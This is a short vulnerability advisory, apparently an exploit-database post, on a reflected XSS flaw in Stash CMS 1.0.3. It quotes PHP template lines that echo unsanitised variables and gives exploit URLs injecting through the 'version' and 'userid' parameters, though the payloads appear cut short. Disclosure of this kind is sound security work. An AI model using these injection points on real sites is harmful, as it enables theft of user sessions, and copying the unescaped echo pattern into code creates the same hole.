###################### Author: #############################
 
Author: Mr.SeCreT
E-mail: g-ff@hotmail.com<mailto:g-ff@hotmail.com>
From: Syria
http://english.islamweb.net/
 
############## Script Information: #########################
 
Script: Stash 1.0.3 Remote XSS Vulnerability
Language: PHP
Download: http://garr.dl.sourceforge.net/project/nice-stash/Stash%20CMS/1.0.3/stash-1.0.3.zip
 
################### Vul Code: ##############################
footer.inc.php:
<?php echo $version; ?>
<?php echo $userid ?>">My Info</a>
<title><?php echo $pagetitle ?></title>
 
header.inc.php:
<?php echo $user ?>
<?php echo $javascript ?>
<?php echo $sitename ?>
 
################### Exploit: ###############################
 
www.site.com/path/admin/footer.inc.php?version=
www.site.com/path/admin/footer.inc.php?userid=">
 
############################################################